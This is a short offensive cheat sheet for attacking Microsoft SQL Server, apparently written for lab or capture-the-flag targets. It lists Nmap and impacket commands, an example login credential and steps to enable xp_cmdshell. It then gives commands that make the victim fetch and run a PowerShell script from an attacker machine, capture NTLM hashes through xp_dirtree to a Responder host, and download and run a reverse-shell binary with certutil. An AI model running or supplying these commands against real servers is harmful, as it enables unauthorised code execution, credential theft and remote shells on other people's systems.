MS SQL

db, enum

Ports #

Gathering info #

# Nmap
nmap -p1433 --script "*ms-sql*" 10.10.209.245

Ways of logging in #

# Using impacket
impacket-mssqlclient ustoun.local/svc-kerb:superman@10.10.209.245

# inside windows cli
sqlcmd /S localhost -q "select @@version;"

# others
mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>

SQL Commands #

-- checks version
select @@version;

-- show databases
EXEC sp_databases;

-- checks if use has sysadmin privileges (1 means
-- sysadmin)
SELECT IS_SRVROLEMEMBER('sysadmin')

-- enables xp_cmdshell
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"

-- executes commands
xp_cmdshell "whoami"
xp_cmdshell dir

-- make victim download from our machine (10.10.14.60)
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.60/shell.ps1\");"

-- Intercept NTLM hash of user (be sure to fire up
-- responder first)
SQL> xp_dirtree '\\10.11.40.33\anything'

-- Transfer a reverse shell binary and execute it
xp_cmdshell certutil -urlcache -f http://10.11.40.33/reverse.exe c:\users\SVC-Kerb.DC01\reverse.exe
xp_cmdshell c:\users\SVC-Kerb.DC01\reverse.exe

Files #

# may contain passwords, used for migration purposes
*.dtsConfig

Others #